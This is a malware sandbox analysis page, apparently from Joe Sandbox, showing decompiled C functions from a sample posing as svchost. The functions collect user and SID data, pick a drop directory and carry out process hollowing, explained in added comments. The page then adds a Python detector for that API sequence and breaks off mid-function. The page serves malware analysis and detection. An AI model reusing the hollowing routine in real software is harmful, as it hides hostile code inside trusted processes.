• Instruction Fuzzy Hash: 3351CE75A0122AAFFB119F24C880B6EBFA9BF4534CF444459ED02AB290D730E944CF98
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E02516A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                  				char _v5;
                                                                                                                                  				char _v6;
                                                                                                                                  				char _v7;
                                                                                                                                  				char _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				long _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				long _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				long _v32;
                                                                                                                                  				void* _t31;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				int _t44;
                                                                                                                                  				void* _t53;
                                                                                                                                  				int _t59;
                                                                                                                                  				CHAR* _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  				int _t73;
                                                                                                                                  
                                                                                                                                  				_t59 = __edx;
                                                                                                                                  				_t68 = _a4;
                                                                                                                                  				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                  				_v12 = _t31;
                                                                                                                                  				if(_t31 == 0xffffffff) {
                                                                                                                                  					 *0x2522180 = 0x5e0d0101;
                                                                                                                                  					 *0x252217c = GetLastError();
                                                                                                                                  					__eflags = 0;
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_v8 =  *_t68;
                                                                                                                                  				_v7 = _t68[1];
                                                                                                                                  				_t63 = _a12;
                                                                                                                                  				_v6 = _t68[2];
                                                                                                                                  				_v5 = 0;
                                                                                                                                  				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
                                                                                                                                  					L10:
                                                                                                                                  					_t43 = E02516987(0x500000, _v12, _a8, _a12, _t63);
                                                                                                                                  					_v28 = _t43;
                                                                                                                                  					if(_t43 != 0) {
                                                                                                                                  						_t44 = CloseHandle(_v12);
                                                                                                                                  						__eflags = _t44;
                                                                                                                                  						if(_t44 != 0) {
                                                                                                                                  							L15:
                                                                                                                                  							return _v28;
                                                                                                                                  						}
                                                                                                                                  						 *0x2522180 = 0x5e0d0103;
                                                                                                                                  						 *0x252217c = GetLastError();
                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                  						L14:
                                                                                                                                  						DeleteFileA(_t68);
                                                                                                                                  						goto L15;
                                                                                                                                  					}
                                                                                                                                  					 *0x2522180 = 0x5e0d0102;
                                                                                                                                  					 *0x252217c = GetLastError();
                                                                                                                                  					CloseHandle(_v12);
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				_t53 = E0251EB0E(_v20 * _v24, 0, _v16, 0);
                                                                                                                                  				_t69 = _t69 + 0x10;
                                                                                                                                  				_t73 = _t59;
                                                                                                                                  				if(_t73 < 0) {
                                                                                                                                  					goto L10;
                                                                                                                                  				}
                                                                                                                                  				if(_t73 > 0 || _t53 > 0x6400000) {
                                                                                                                                  					_t22 = E0251ECA5() % 0x500000 + 0xa00000; // 0xa00000
                                                                                                                                  					_t63 = _t22;
                                                                                                                                  					goto L10;
                                                                                                                                  				} else {
                                                                                                                                  					__eflags = _t59;
                                                                                                                                  					if(__eflags < 0) {
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					if(__eflags > 0) {
                                                                                                                                  						L9:
                                                                                                                                  						_t63 = (E0251ECA5() & 0x001fffff) + 0x300000;
                                                                                                                                  						__eflags = (E0251ECA5() & 0x001fffff) + 0x300000;
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t53 - 0x3200000;
                                                                                                                                  					if(_t53 <= 0x3200000) {
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					goto L9;
                                                                                                                                  				}
                                                                                                                                   			}

                                                                                                                                  0x02516a60
                                                                                                                                  0x02516a68
                                                                                                                                  0x02516a7d
                                                                                                                                  0x02516a83
                                                                                                                                  0x02516a89
                                                                                                                                  0x02516b8c
                                                                                                                                  0x02516b9c
                                                                                                                                  0x02516ba1
                                                                                                                                  0x00000000
                                                                                                                                  0x02516ba1
                                                                                                                                  0x02516a91
                                                                                                                                  0x02516a97
                                                                                                                                  0x02516a9e
                                                                                                                                  0x02516aa1
                                                                                                                                  0x02516ab8
                                                                                                                                  0x02516ac3
                                                                                                                                  0x02516b1d
                                                                                                                                  0x02516b27
                                                                                                                                  0x02516b2f
                                                                                                                                  0x02516b34
                                                                                                                                  0x02516b5f
                                                                                                                                  0x02516b61
                                                                                                                                  0x02516b63
                                                                                                                                  0x02516b86
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b89
                                                                                                                                  0x02516b65
                                                                                                                                  0x02516b78
                                                                                                                                  0x02516b7d
                                                                                                                                  0x02516b7f
                                                                                                                                  0x02516b80
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b80
                                                                                                                                  0x02516b36
                                                                                                                                  0x02516b49
                                                                                                                                  0x02516b4e
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b4e
                                                                                                                                  0x02516ad2
                                                                                                                                  0x02516ad7
                                                                                                                                  0x02516ada
                                                                                                                                  0x02516adc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516ade
                                                                                                                                  0x02516af5
                                                                                                                                  0x02516af5
                                                                                                                                  0x00000000
                                                                                                                                  0x02516afd
                                                                                                                                  0x02516afd
                                                                                                                                  0x02516aff
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b01
                                                                                                                                  0x02516b0a
                                                                                                                                  0x02516b17
                                                                                                                                  0x02516b17
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b17
                                                                                                                                  0x02516b03
                                                                                                                                  0x02516b08
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516b08

                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,761F81D0,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516A7D
                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(02519E9D,02519A60,?,?,?,025222F8,?,?,?,02519A60,?,?,02519E9D), ref: 02516ABB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B40
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B4E
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B5F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B6F
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B7D
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,02519A60,?,?,02519E9D), ref: 02516B80
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,02519A60,?,?,02519E9D,?,?,?,?,?,02519E9D,?,00000022,?), ref: 02516B96
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3188212458-0
                                                                                                                                  • Opcode ID: 5c77ada49a2eb1ecdbda056dd4621c4e0d7a88aeccd2ed5a434ff41be3516c11
                                                                                                                                  • Instruction ID: 582f0628505956d5a00345d9f0ed937d70221a77d9e5c52f4963c5aff48b5271
                                                                                                                                  • Opcode Fuzzy Hash: 5c77ada49a2eb1ecdbda056dd4621c4e0d7a88aeccd2ed5a434ff41be3516c11
                                                                                                                                  • Instruction Fuzzy Hash: B031F176D01209AFEB11AFA08C44EAE7FBDFB99310F054866E611E3280D730855C9F69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E02516F5F(long _a4, long _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				union _SID_NAME_USE _v16;
                                                                                                                                  				void _v84;
                                                                                                                                  				char _v212;
                                                                                                                                  				CHAR* _t36;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                  				char _t62;
                                                                                                                                  				void* _t65;
                                                                                                                                  				char* _t66;
                                                                                                                                  				intOrPtr _t67;
                                                                                                                                  				CHAR* _t68;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t68 = _a4;
                                                                                                                                  				 *_t68 = 0;
                                                                                                                                  				if(GetUserNameA(_t68,  &_a8) == 0) {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_t36 = _t68;
                                                                                                                                  				_t66 =  &(_t36[1]);
                                                                                                                                  				do {
                                                                                                                                  					_t62 =  *_t36;
                                                                                                                                  					_t36 =  &(_t36[1]);
                                                                                                                                  				} while (_t62 != 0);
                                                                                                                                  				_a8 = _t36 - _t66;
                                                                                                                                  				_a4 = 0x7c;
                                                                                                                                  				_v12 = 0x80;
                                                                                                                                  				if(LookupAccountNameA(0, _t68,  &_v84,  &_a4,  &_v212,  &_v12,  &_v16) == 0) {
                                                                                                                                  					L8:
                                                                                                                                  					_a8 = _a8 + wsprintfA( &(_t68[_a8]), "/%d", E02516EDD());
                                                                                                                                  					return _a8;
                                                                                                                                  				}
                                                                                                                                  				E0251EF00( &(_t68[_a8]), "/");
                                                                                                                                  				_a8 = _a8 + 1;
                                                                                                                                  				_push( &_v8);
                                                                                                                                  				_t53 =  &_v84;
                                                                                                                                  				_push(_t53);
                                                                                                                                  				L0251F4AA();
                                                                                                                                  				if(_t53 == 0) {
                                                                                                                                  					goto L8;
                                                                                                                                  				}
                                                                                                                                  				_t54 = _v8;
                                                                                                                                  				_t20 = _t54 + 1; // 0x121
                                                                                                                                  				_t65 = _t20;
                                                                                                                                  				do {
                                                                                                                                  					_t67 =  *_t54;
                                                                                                                                  					_t54 = _t54 + 1;
                                                                                                                                  				} while (_t67 != 0);
                                                                                                                                  				_a4 = _t54 - _t65;
                                                                                                                                  				E0251EE08( &(_t68[_a8]), _v8, _t54 - _t65 + 1);
                                                                                                                                  				_a8 = _a8 + _a4;
                                                                                                                                  				_t69 = _t69 + 0xc;
                                                                                                                                  				LocalFree(_v8);
                                                                                                                                  				goto L8;
                                                                                                                                   			}

                                                                                                                                  0x02516f6c
                                                                                                                                  0x02516f77
                                                                                                                                  0x02516f82
                                                                                                                                  0x00000000
                                                                                                                                  0x02517047
                                                                                                                                  0x02516f88
                                                                                                                                  0x02516f8a
                                                                                                                                  0x02516f8d
                                                                                                                                  0x02516f8d
                                                                                                                                  0x02516f8f
                                                                                                                                  0x02516f90
                                                                                                                                  0x02516f96
                                                                                                                                  0x02516fb3
                                                                                                                                  0x02516fba
                                                                                                                                  0x02516fc9
                                                                                                                                  0x02517025
                                                                                                                                  0x0251703f
                                                                                                                                  0x00000000
                                                                                                                                  0x02517042
                                                                                                                                  0x02516fd6
                                                                                                                                  0x02516fdb
                                                                                                                                  0x02516fe3
                                                                                                                                  0x02516fe4
                                                                                                                                  0x02516fe7
                                                                                                                                  0x02516fe8
                                                                                                                                  0x02516fef
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516ff1
                                                                                                                                  0x02516ff4
                                                                                                                                  0x02516ff4
                                                                                                                                  0x02516ff7
                                                                                                                                  0x02516ff7
                                                                                                                                  0x02516ff9
                                                                                                                                  0x02516ffa
                                                                                                                                  0x02517000
                                                                                                                                  0x0251700e
                                                                                                                                  0x02517016
                                                                                                                                  0x02517019
                                                                                                                                  0x0251701f
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,0251D7C3), ref: 02516F7A
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,0251D7C3), ref: 02516FC1
                                                                                                                                  • ConvertSidToStringSidA.ADVAPI32(?,00000120), ref: 02516FE8
                                                                                                                                  • LocalFree.KERNEL32(00000120), ref: 0251701F
                                                                                                                                  • wsprintfA.USER32 ref: 02517036
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountConvertFreeLocalLookupStringUserwsprintf
                                                                                                                                  • String ID: /%d$|
                                                                                                                                  • API String ID: 676856371-4124749705
                                                                                                                                  • Opcode ID: 46dcd9275790cd22d68c58c2fbd0f876a5477cec1468585ddd5f336b69b7cbe4
                                                                                                                                  • Instruction ID: 87a1e8ab997e52c8f4f610c95123d25c110a9fb65e7723eceeac8c95b582e711
                                                                                                                                  • Opcode Fuzzy Hash: 46dcd9275790cd22d68c58c2fbd0f876a5477cec1468585ddd5f336b69b7cbe4
                                                                                                                                  • Instruction Fuzzy Hash: 9B312D72900219AFEB11DFA8D849AEA7BBCFF05314F048156F819DB140DB35E608CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 80%
			// Resolves and caches the directory the bot drops into. 0x2522e08 is a global
			// 0x104-byte (MAX_PATH) buffer; once it holds a path the function just returns it.
			// Fallback chain: GetSystemWow64DirectoryA (resolved at run time because it is not
			// exported on every Windows build) -> GetSystemDirectoryA -> GetWindowsDirectoryA ->
			// a hard-coded string decoded by E02512544 (interpretation of the call pattern, not a
			// symbol from the sample). The Strings entry above shows the result on the analysis
			// host: C:\Windows\SysWOW64\ (trailing backslash appended by the loop at L11).
			E02516CC9(void* __ecx) {
				_Unknown_base(*)()* _t8;
				CHAR* _t17;
				void* _t18;
				void* _t23;
				char _t25;
				void* _t34;

				_t23 = __ecx;
				if( *0x2522e08 != 0) {
					L14:
					return 0x2522e08;   // already resolved: return the cached path
				}
				_t8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemWow64DirectoryA");
				if(_t8 == 0) {
					L4:
					if(GetSystemDirectoryA(0x2522e08, 0x104) == 0 ||  *0x2522e08 == 0) {
						if(GetWindowsDirectoryA(0x2522e08, 0x104) == 0 ||  *0x2522e08 == 0) {
							// Last resort: copy a decoded, hard-coded path into the buffer.
							// E0251EF00/E0251EF1E behave like strcpy/strcat and E0251EE2A like
							// memset (it is called with (buf, 0, size) here and in E0251977C).
							E0251EF00(0x2522e08, E02512544(0x25222f8, 0x2520664, 0xb, 0xe4, 0xc8));
							E0251EE2A(_t23, 0x25222f8, 0, 0x100);   // wipe the decoded string
							_t34 = _t34 + 0x28;
						}
						E0251EF1E(0x2522e08, E02512544(0x25222f8, 0x2520658, 0xb, 0xe4, 0xc8));
						E0251EE2A(_t23, 0x25222f8, 0, 0x100);
					}
					L10:
					_t17 = 0x2522e08;
					goto L11;
					L11:
					// Walk to the terminating NUL of the path.
					_t25 =  *_t17;
					_t17 =  &(_t17[1]);
					if(_t25 != 0) {
						goto L11;
					} else {
						// _t18 = strlen(path); append '\\' (0x5c) unless the path already ends with one.
						_t18 = _t17 - 0x2522e09;
						if( *((char*)(_t18 + 0x2522e07)) != 0x5c) {
							 *((char*)(_t18 + 0x2522e08)) = 0x5c;
							 *((char*)(_t18 + 0x2522e09)) = _t25;   // _t25 == 0: re-terminate
						}
						goto L14;
					}
				}
				// GetSystemWow64DirectoryA is available: call it through the resolved pointer.
				_push(0x104);
				_push(0x2522e08);
				if( *_t8() == 0 ||  *0x2522e08 == 0) {
					goto L4;
				} else {
					goto L10;
				}
			}
                                                                                                                                  0x02516cc9
                                                                                                                                  0x02516cd6
                                                                                                                                  0x02516dbe
                                                                                                                                  0x02516dc1
                                                                                                                                  0x02516dc1
                                                                                                                                  0x02516cee
                                                                                                                                  0x02516cfb
                                                                                                                                  0x02516d12
                                                                                                                                  0x02516d1c
                                                                                                                                  0x02516d40
                                                                                                                                  0x02516d60
                                                                                                                                  0x02516d69
                                                                                                                                  0x02516d6e
                                                                                                                                  0x02516d6e
                                                                                                                                  0x02516d86
                                                                                                                                  0x02516d8f
                                                                                                                                  0x02516d98
                                                                                                                                  0x02516d99
                                                                                                                                  0x02516d99
                                                                                                                                  0x02516d9e
                                                                                                                                  0x02516d9f
                                                                                                                                  0x02516d9f
                                                                                                                                  0x02516da1
                                                                                                                                  0x02516da4
                                                                                                                                  0x00000000
                                                                                                                                  0x02516da6
                                                                                                                                  0x02516da6
                                                                                                                                  0x02516daf
                                                                                                                                  0x02516db1
                                                                                                                                  0x02516db8
                                                                                                                                  0x02516db8
                                                                                                                                  0x00000000
                                                                                                                                  0x02516daf
                                                                                                                                  0x02516da4
                                                                                                                                  0x02516cfd
                                                                                                                                  0x02516cfe
                                                                                                                                  0x02516d03
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,025222F8,000000E4,02516DDC,000000C8), ref: 02516CE7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02516CEE
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 02516D14
                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02516D2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleModuleProcSystemWindows
                                                                                                                                  • String ID: C:\Windows\SysWOW64\$GetSystemWow64DirectoryA$kernel32
                                                                                                                                  • API String ID: 1082366364-3395550214
                                                                                                                                  • Opcode ID: 8e25ee06a9b2434124382fe50ab85226ca27f71d73d9ae803516f6372cc39049
                                                                                                                                  • Instruction ID: 8e5f6febbd7c48bffa088b4bba4e187349f3df3355fcbdccfe207ef9c3a24ca6
                                                                                                                                  • Opcode Fuzzy Hash: 8e25ee06a9b2434124382fe50ab85226ca27f71d73d9ae803516f6372cc39049
                                                                                                                                  • Instruction Fuzzy Hash: 60213855A822657EF7315B328C89F773E4DAB63704F0E0444FC04E60C0C795994DA2AE
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 82%
			// Process hollowing (the behaviour behind "Injects a PE file into a foreign
			// processes" and "System process connects to network" in the signature list).
			// _a4 is the command line of the host process to hollow. The child is created
			// suspended, its primary thread context is read, a payload image is written into
			// it by E0251637C, PEB->ImageBaseAddress is patched and the thread's entry point
			// (Eax) is redirected before the thread is resumed.
			E0251977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;                 // image base of the injected payload (set by E0251637C)
				char _v28;                 // entry point of the injected payload (set by E0251637C)
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				void* _t33;

				_t46 = __ecx;
				E0251EE2A(__ecx,  &_v96, 0, 0x44);   // memset(&si, 0, sizeof(STARTUPINFOA))
				_v96.cb = 0x44;
				// dwCreationFlags = 4 = CREATE_SUSPENDED: the primary thread never runs the
				// host image's own code.
				if(CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20) != 0) {
					E0251EE2A(_t46,  &_v812, 0, 0x2cc);   // memset(&ctx, 0, sizeof(CONTEXT))
					// 0x10002 = CONTEXT_i386 | CONTEXT_INTEGER: enough to read Ebx and write Eax.
					_v812.ContextFlags = 0x10002;
					if(GetThreadContext(_v20.hThread,  &_v812) != 0) {
						// Map the payload (this module, _entry_) into the child; on failure or
						// any later failure the child is killed rather than left suspended.
						_t33 = E0251637C(_entry_, _v20.hProcess,  &_v28,  &_v24);
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						// In a freshly created suspended x86 process Ebx holds the PEB address;
						// PEB+8 is ImageBaseAddress. Overwrite it (4 bytes) with the payload base.
						if(WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??) == 0) {
							goto L3;
						}
						// Eax holds the entry point the loader will jump to: redirect it to the payload.
						_v812.Eax = _v28;
						if(SetThreadContext(_v20.hThread,  &_v812) == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread);   // payload now runs under the host's name
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}
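The API sequence E0251977C issues (CreateProcessA with CREATE_SUSPENDED, GetThreadContext, a pointer-sized WriteProcessMemory, SetThreadContext, ResumeThread) is a compact process-hollowing signature that can be matched against an API trace. The following detector is an added example written for this page, not code from Joe Sandbox or from the sample. The trace lines it parses are constructed to mirror the "APIs" listing of this function (the bullet, `Api.MODULE(args), ref: addr` layout), and it assumes the report's argument order: dwCreationFlags is the sixth CreateProcessA argument and nSize the fourth WriteProcessMemory argument.

```python
"""Flag a process-hollowing API sequence in a Joe-Sandbox-style API trace.

Added illustration, not code from the report or from the sample. TRACE mirrors
the report's listing for E0251977C; BENIGN_TRACE is a constructed control that
creates a process without CREATE_SUSPENDED.
"""
import re
from dataclasses import dataclass

CREATE_SUSPENDED = 0x4

# "• CreateProcessA.KERNEL32(00000000,02519947,...), ref: 025197B1"
CALL_RE = re.compile(
    r"^\s*[•*]?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\)"
    r"(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

# Stages in the order the decompiled function issues them (suffix A/W stripped).
SEQUENCE = ["CreateProcess", "GetThreadContext", "WriteProcessMemory",
            "SetThreadContext", "ResumeThread"]

TRACE = """
• CreateProcessA.KERNEL32(00000000,02519947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,025222F8), ref: 025197B1
• GetThreadContext.KERNEL32(?,?,?,?,?,?,?,025222F8), ref: 025197EB
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,025222F8), ref: 02519831
• SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,025222F8), ref: 0251984E
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,025222F8), ref: 0251985B
"""

# Constructed control: a normal (non-suspended) launch followed by a bulk write.
BENIGN_TRACE = """
• CreateProcessA.KERNEL32(00000000,00401000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401234
• GetThreadContext.KERNEL32(?,?), ref: 00401240
• WriteProcessMemory.KERNEL32(?,?,?,00001000,00000000), ref: 00401250
• SetThreadContext.KERNEL32(?,00010002), ref: 00401260
• ResumeThread.KERNEL32(?), ref: 00401270
"""


@dataclass
class Call:
    api: str
    module: str
    args: list   # raw hex strings; '?' where the sandbox could not resolve a value
    ref: str


def parse_trace(text):
    """Parse the report-style bullet lines into Call records (unparseable lines are skipped)."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args").strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref") or ""))
    return calls


def arg_int(call, idx):
    """Argument idx as an int, or None when it is missing or unresolved ('?')."""
    if idx >= len(call.args):
        return None
    try:
        return int(call.args[idx], 16)
    except ValueError:
        return None


def detect_hollowing(calls):
    """Return a list of findings, each the ordered list of Calls that completed the sequence."""
    findings, matched, stage = [], [], 0
    for c in calls:
        base = re.sub(r"[AW]$", "", c.api)          # CreateProcessA -> CreateProcess
        if base == "TerminateProcess" and stage:
            matched, stage = [], 0                    # the function bails out on any failure
            continue
        if base != SEQUENCE[stage]:
            continue
        if base == "CreateProcess":
            flags = arg_int(c, 5)                     # dwCreationFlags
            if flags is None or not flags & CREATE_SUSPENDED:
                continue                              # ordinary launch, not a hollowing host
        if base == "WriteProcessMemory":
            # PEB->ImageBaseAddress overwrite is pointer-sized: 4 bytes on x86, 8 on x64.
            if arg_int(c, 3) not in (4, 8):
                continue
        matched.append(c)
        stage += 1
        if stage == len(SEQUENCE):
            findings.append(matched)
            matched, stage = [], 0
    return findings
```

The pointer-sized WriteProcessMemory check is what separates this pattern from debuggers and instrumentation tools, which also create suspended processes and touch thread contexts but rarely write exactly one pointer right after reading the context. The state machine does not follow process handles across calls because the sandbox resolves most of them to `?`; on a trace with resolved handles, keying the stages on hProcess/hThread removes false matches from interleaved launches.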
                                                                                                                                  0x0251977c
                                                                                                                                  0x0251978f
                                                                                                                                  0x025197a9
                                                                                                                                  0x025197b9
                                                                                                                                  0x025197cf
                                                                                                                                  0x025197e1
                                                                                                                                  0x025197f3
                                                                                                                                  0x02519811
                                                                                                                                  0x02519819
                                                                                                                                  0x0251981c
                                                                                                                                  0x025197f6
                                                                                                                                  0x025197f9
                                                                                                                                  0x00000000
                                                                                                                                  0x025197f9
                                                                                                                                  0x02519839
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251983e
                                                                                                                                  0x02519856
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251985b
                                                                                                                                  0x00000000
                                                                                                                                  0x02519863
                                                                                                                                  0x025197f5
                                                                                                                                  0x025197f5
                                                                                                                                  0x00000000
                                                                                                                                  0x025197f5
                                                                                                                                  0x025197bb
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,02519947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,025222F8), ref: 025197B1
                                                                                                                                  • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,025222F8), ref: 025197EB
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,025222F8), ref: 025197F9
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,025222F8), ref: 02519831
                                                                                                                                  • SetThreadContext.KERNEL32(?,00010002,?,?,?,?,?,?,?,?,?,025222F8), ref: 0251984E
                                                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,025222F8), ref: 0251985B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 2981417381-2746444292
                                                                                                                                  • Opcode ID: c446b12ebee8eecb12d1976b94599bd131859632ebebe16c6d703dd8f6904238
                                                                                                                                  • Instruction ID: 697a889d2026e7097ca497deb19ec19d24d95ad03505c1f6250a5319ee7a9986
                                                                                                                                  • Opcode Fuzzy Hash: c446b12ebee8eecb12d1976b94599bd131859632ebebe16c6d703dd8f6904238
                                                                                                                                  • Instruction Fuzzy Hash: 3B211D71D41129BBEB219FA1DC49FEF7F7CFF05654F000861B919E1080EB309658CAA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 26%
                                                                                                                                  			E025126FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
                                                                                                                                  				long* _t33;
                                                                                                                                  				long _t35;
                                                                                                                                  				long* _t36;
                                                                                                                                  				long _t37;
                                                                                                                                  				long _t38;
                                                                                                                                  				short _t39;
                                                                                                                                  				short _t40;
                                                                                                                                  				char _t42;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				void* _t48;
                                                                                                                                  				long* _t49;
                                                                                                                                  				long* _t51;
                                                                                                                                  				long* _t52;
                                                                                                                                  				long* _t53;
                                                                                                                                  				long* _t54;
                                                                                                                                  				void* _t55;
                                                                                                                                  				long* _t56;
                                                                                                                                  				long* _t57;
                                                                                                                                  				long* _t60;
                                                                                                                                  				intOrPtr* _t63;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				void* _t66;
                                                                                                                                  
                                                                                                                                  				_t65 = __eax;
                                                                                                                                  				_t33 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t42 = 0;
                                                                                                                                  				if(_t33 == 0) {
                                                                                                                                  					_t33 = E0251EBCC(0x400);
                                                                                                                                  					_pop(_t48);
                                                                                                                                  					 *0x2522bf8 = _t33;
                                                                                                                                  				}
                                                                                                                                  				E0251EE2A(_t48, _t33, _t42, 0x400);
                                                                                                                                  				_t35 = GetTickCount();
                                                                                                                                  				_t49 =  *0x2522bf8; // 0x0
                                                                                                                                  				_t63 = __imp__#9;
